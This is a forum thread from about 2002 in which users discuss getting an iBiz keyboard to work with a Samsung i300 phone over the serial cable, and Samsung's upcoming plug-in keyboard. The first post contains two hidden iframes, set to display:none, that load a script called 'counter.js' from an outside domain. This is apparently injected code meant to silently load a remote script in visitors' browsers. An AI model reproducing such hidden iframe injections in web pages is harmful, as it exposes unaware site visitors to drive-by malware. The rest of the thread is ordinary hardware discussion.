+ Reply to Thread
Page 1 of 15 1 2 3 4 5 11 ... LastLast

Keyboard Update < :) >

Guys,

Just a quick note that I've gotten the Ibiz keyboard to successfully work using the samsung serial cable.. (but NOT with the docking station..)

-mark<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Which driver are you using? The standard one or the Visor one?

Administrator

Arrow

tell us more..

what can you do and not do with the 'board? also are you abel to use it while online? yes, which driver did you use??

is there a website with pics and info for the ibiz?

I'm using the visor driver. the keyboard is available here:

http://www.ibizcorp.com/pda_accessor...a_keysync.html

(FYI - I actually purchased this from Frys electronics for $49.)

It seems to work w/ and w/o the batteries (which tells me that the serial port is allowing a draw on that port..)

Works fine online; and seems to keep up with my typing. only problem is placing the screen; the keyboard doesn't work with the docking station, only with the serial cable (which is unfortunate, the docking station would have placed the screen perfectly) - so you have to stand the phone up on something to see the screen while typing on it.

-mark

Can you tell me where I can get a keyboard for the I300? What would one cost?

Thanks

Aside from the option mentioned in the thread, there is none. Samsung has indicated their intent to release one by mid year.

Where can I buy the Samsung serial cable (and how much is it?) So I just hook that cable to the keyboard, install the visor driver, and I'm good to go?

Originally posted by crispin
    Where can I buy the Samsung serial cable (and how much is it?) So I just hook that cable to the keyboard, install the visor driver, and I'm good to go?
    You can purchase the serial data cable from samsung directly, or from Samsung. On samsung's site, register, and you'll get 15-20% off (can't remember which one..)

and yep; it's fairly simple.
    -mark

Great--thanks!

Keyboard at PalmSource

Samsung was showing of a plug-in keyboard at PalmSource. According to the sales guy, should be available in about a month. He thought the price would be ~$50.

skiview - thanks for the update - this has been a very emotional discussion on this board in the past!

BTW, when you say plug-in, does that mean it is connected to the i300 via a cable? Does it provide anyway to prop up the phone, like the palm keyboards do?
    Cliff

Administrator

Arrow

ya know, it would make sense for them to have it set up so that it will conect to the conector on the keyboard... c'mon samsung, dont fall off the wagon now!

Keyboard

No, it plugs into the sync connector directly. Not something you'd want to leave on and try to stick in your pocket. Not great looking, but the button spacing seemed pretty usable.

Pics???Pics???

No pics

Sorry, no camera were allowed on the Expo floor. It was very similar to the ClipKee that came out for the iPaq

http://www.allnetdevices.com/wireles..._keyboard.html

Smasung isn't mnaufacturing it, but will be selling it.

Wow. I was hoping for a full sized keyboard. Oh well.

Administrator

Arrow

is it the same size as in the pic above? that would be fine for me.. as longas i can use the keyboard while in a data call... thats gopnna be the icing on the cake.

Re: Keyboard

Originally posted by skiview
    No, it plugs into the sync connector directly. Not something you'd want to leave on and try to stick in your pocket. Not great looking, but the button spacing seemed pretty usable.
    So,,,, it sounds like a thumb-type keyboard (ala handspring's treo)... I've always envisioned (although not used) cupping my hands around these keyboards and using my thumbs to press the keys... kinda like people in chicago, when it's freezin outside, and they've cupped their hands around a hot cup of, er, hot chocolate to try to warm up a little bit.... :p

So, if that's how the keyboard is to be used, and it's direct-connected to the i300, are you then supposed to cradle both in your hands..?... if so, that better be a strong connection between the kboard and the i300...

'nother q- when direct-connected and you put it down, do both the kboard and the i300 lay flat, or is the kboard flat and the i300 propped up (i'm assuming the former)?

i'm interested to see how this thing works out...
    Last edited by crlipman; 02-07-2002 at 11:39 AM.
    Cliff

Has everyone seen this adapter yet?

Home built, Kyo 6035 to PalmIII adapter. A lot or peripherals work like the backup module, the palm pix, and the gotype keyboard. No folding keyboard tho!

Nate

http://www.palmblvd.com/boards/Kyoce...ages/1216.html

+ Reply to Thread
Page 1 of 15 1 2 3 4 5 11 ... LastLast